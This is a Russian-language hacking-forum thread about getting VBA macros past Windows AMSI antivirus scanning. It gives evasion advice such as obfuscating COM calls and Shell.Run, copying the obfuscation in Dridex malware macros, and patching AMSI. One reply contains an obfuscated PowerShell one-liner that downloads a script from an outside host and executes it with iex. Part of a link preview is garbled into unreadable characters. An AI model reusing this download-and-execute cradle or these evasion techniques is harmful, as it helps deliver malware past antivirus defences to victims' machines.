Всем привет! Пытаюсь работать с макросами, возникли проблемы с amsi на этапе работы с com обьектами. Естественно понимаю, что рабочие решения по обходу, отключению являются приватными и никто не захочет просто так ими делиться, но может кто то намекнет в какую сторону копать! Спасибо!
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Обход AMSI
- Автор темы chyond
- Дата начала
Полтора года же прошло
- Автор темы
- Добавить закладку
- #4
Да спасибо! Эту статью естественно видел, и смотрел. Но как я понял, что бы сделать что то подобное то нужно погонять процесс word.exe в WinDBG, и найти какаю то свою функцию, от которой искать смещение AmsiScanBuffer. Особо не работал с WinDBG, но готов поизучать данное направление. Хотелось бы узнать перспективно ли это? Еще читал, что некоторые решения обходят, а не отключают amsi, как в данной статье. Может есть мысли куда копать?
Ну если сделаешь так, что сам обход не запалится, то перспективно.
AMSI в общем случае - сигнатурная проверка, ее можно обойти за счет обфускации автоматической или ручной.
- Автор темы
- Добавить закладку
- #6
Да, я понимаю, но как можно обфусцировать VBA код, если AMSI логирует вызовы WinAPI и COM? На сколько я понимаю, как не меняй названия функций и переменных, вызов API останеться прежним!? Или я что то не правильно понимаю? Спасибо!
Еще раз AMSI - сигнатурный детект, она не ничего не логирует.
- Автор темы
- Добавить закладку
- #8
Понял, то есть необходима обфускация кода vba?
Ну очевидно так.
- Автор темы
- Добавить закладку
- #10
Я это к тому, что я пробовал менять названия переменных, функций, добавлять мусорный код. Результат тот же, amsi срабатывает, по этому и решил сюда написать. Возможно я не правильно понимаю обфускацию в данном контексте?
Ну покажи, что ты и как менял. Ну и опять же AMSI это интерфейс для скриптовых языков к антивирусу. По интерфейсу передается строка и возвращается, нашлась там сигнатура или нет. Если антивирус ставит свой провайдер (как Касперский например), то в теории с этой строкой может происходить все, что угодно, вплоть до деобфускации и эмуляции VBA, или отправки этой строки в облако. Но по-умолчанию AMSI - чисто сигнатурная вещь.
Вызовы объектов тоже надо обфусцировать.И тем более когда у тебя идёт Shell.Run. А как ты это делать будешь,уже вопрос гораздо сложнее. Но ты можешь взять макросы от dridex на малварьбазаре например и глянуть алгоритм обфускации.
Оффтоп, но как обфуцировать вызовы в скриптовых языках?
Например интересует пш обфускация вызовов. Простой сет алиаса поможет ли с этим? Есть кто шарит?
- Автор темы
- Добавить закладку
- #14
Строки предсталял как склейку символов, символы представляю как Chr() от чисел, меняю названия переменных, меняю порядок вызовов функций, где возможно. Добавляю мусорный код(арифметические операции).
ну вот покажи семпл - чистый код -> пару семплов обфуцированного кода твоим обфускатором. Ибо то, что ты перечислил должен обходить амси. Или все тобой написано пезжо
Reflection
C# и .NET | Применение рефлексии и исследование типов
ÐÑименение ÑеÑлекÑии в ÑзÑке пÑогÑаммиÑÐ¾Ð²Ð°Ð½Ð¸Ñ C# и .NET Ð´Ð»Ñ Ð¸ÑÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ Ñипов, полÑÑение меÑодов, ÑвойÑÑв, полей клаÑÑа, меÑод GetMembers, клаÑÑ MemberInfo
metanit.com
в пш,как пример, воспользуйся функией реплейс
Код:
[string]$a={(New-Object Net.WebClient).Doyeksleisling('http://quarez.atwebpages.com/ds/le.txt')};$b=$a.replace('yeksleisl','wnloadStr');$c=iex $b;iex $cНасколько это эффективно будет? Я имел ввиду обфускация самих вызовов в контексте приложения, чтоб просто по call map палево не прилетело, а не обфускация строк вызовов на то, что могут сигнатурный детект поставить.
пропачить амси можно, на пш рабоатает на ура.